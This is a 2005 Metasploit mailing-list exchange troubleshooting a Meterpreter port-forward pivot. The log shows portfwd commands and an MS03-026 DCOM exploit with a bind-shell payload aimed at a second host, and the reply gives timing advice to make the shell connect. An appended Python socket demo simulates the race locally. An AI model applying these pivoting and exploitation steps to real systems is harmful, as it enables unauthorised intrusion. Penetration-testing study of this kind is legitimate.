Metasploit mailing list archives
use of meterpreter (copy for the list )
From: mmiller at hick.org (mmiller at hick.org)
Date: Fri, 15 Apr 2005 02:14:10 -0500
On Fri, Apr 15, 2005 at 08:58:06AM +0200, Thomas Werth wrote:
> Just took a second try, but I'm still doing something wrong :( Here's "the log":
>
> 1. Hacking "proxy Host"
>
> 2. setting up portforwarding
>
>     meterpreter> portfwd -a -L 127.0.0.1 -l 9000 -h 'NextTargetIP' -p 135
>     portfwd: Successfully created local listener on port 9000.
>     meterpreter> portfwd -a -L 127.0.0.1 -l 5555 -h 'NextTargetIP' -p 5555
>     portfwd: Successfully created local listener on port 5555.
>     meterpreter> portfwd -v
>     Local port forward listeners:
>         127.0.0.1:9000 <-> 'NextTargetIP':135
>         127.0.0.1:5555 <-> 'NextTargetIP':5555
>
> 3. Launching another instance of metasploit and prepare next exploit
>
>     Exploit and Payload Options
>     ===========================
>
>     Exploit:    Name       Default     Description
>     --------    ------     ---------   ------------------
>     required    RHOST      127.0.0.1   The target address
>     required    RPORT      9000        The target port
>
>     Payload:    Name       Default     Description
>     --------    --------   -------     ------------------------------------------
>     required    EXITFUNC   thread      Exit technique: "process", "thread", "seh"
>     required    LPORT      5555        Listening port for bind shell
>
>     Target: Windows NT SP6/2K/XP/2K3 ALL
>
>     msf msrpc_dcom_ms03_026(win32_bind) > exploit
>     [*] Starting Bind Handler.
>     [*] Got connection from 127.0.0.1:32772 <-> 127.0.0.1:5555
>     [*] Exiting Bind Handler.
>
> Maybe I set up the proxy for the listen port wrong, or something else? What do I have to fix?
My guess is that what's happening is the bind handler is establishing the connection before you've finished exploiting the host. What I'd recommend doing is waiting a few seconds to create the port 5555 port forward until after the exploit should have completed. Once it has, create the port forward on port 5555 and the bind handler should establish its connection. Right now this is all kind of kludgey because it isn't really fully integrated (more of a prototype), but it should work. What's happening right now is the bind handler is establishing the connection to port 5555 immediately (before the exploit even takes place) which then instructs the meterpreter server to connect to the target host on port 5555. Since the exploit hasn't finished, the target host isn't listening on port 5555 and thus the meterpreter server returns a failure indication to the client which causes it to close its half of the port forward for that connection (thus why the bind handler exits).
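The race described above, reproduced as an added Python example (not Metasploit's or Meterpreter's own code): a minimal local port forward that, like portfwd, only attempts the onward connection when a client arrives, and drops that client if the target refuses. The "target" is a constructed socket that is bound but not yet listening, standing in for the host before the exploit has completed; the names start_forward, start_echo_target, probe and demo are this example's own.

```python
import contextlib
import socket
import threading

def _pipe(src, dst):
    # Copy one direction until src hits EOF, then pass that EOF on to dst's peer.
    with contextlib.suppress(OSError):
        while chunk := src.recv(4096):
            dst.sendall(chunk)
        dst.shutdown(socket.SHUT_WR)

def start_forward(target_port):
    # Local listener on 127.0.0.1:<ephemeral>; returns that port. As with portfwd,
    # the onward connection to the target is attempted only when a client connects.
    lsock = socket.create_server(("127.0.0.1", 0))
    def accept_loop():
        while True:
            client, _ = lsock.accept()
            try:
                remote = socket.create_connection(("127.0.0.1", target_port), timeout=2)
            except OSError:
                client.close()  # target refused: the failure is reported by dropping our half
                continue
            for a, b in ((client, remote), (remote, client)):
                threading.Thread(target=_pipe, args=(a, b), daemon=True).start()
    threading.Thread(target=accept_loop, daemon=True).start()
    return lsock.getsockname()[1]

def start_echo_target(sock):
    # The target finally listening (the exploit has completed): echo one client's message.
    sock.listen()
    def serve():
        conn, _ = sock.accept()
        with conn:
            conn.sendall(conn.recv(4096))
    threading.Thread(target=serve, daemon=True).start()

def probe(port):
    # Play the bind handler: connect through the forward, send, read. b"" means dropped.
    with contextlib.suppress(OSError), socket.create_connection(("127.0.0.1", port), timeout=2) as s:
        s.sendall(b"hello")
        return s.recv(4096)
    return b""

def demo():
    target = socket.socket()
    target.bind(("127.0.0.1", 0))  # port reserved (constructed target), nothing listening yet
    fwd_port = start_forward(target.getsockname()[1])
    too_early = probe(fwd_port)    # handler connects before the target listens: dropped
    start_echo_target(target)      # target now listens: the same forward carries the session
    return too_early, probe(fwd_port)
```

Calling demo() returns (b"", b"hello"): the first connection through the forward is closed because the target refused, the second one, made once the target listens, goes through.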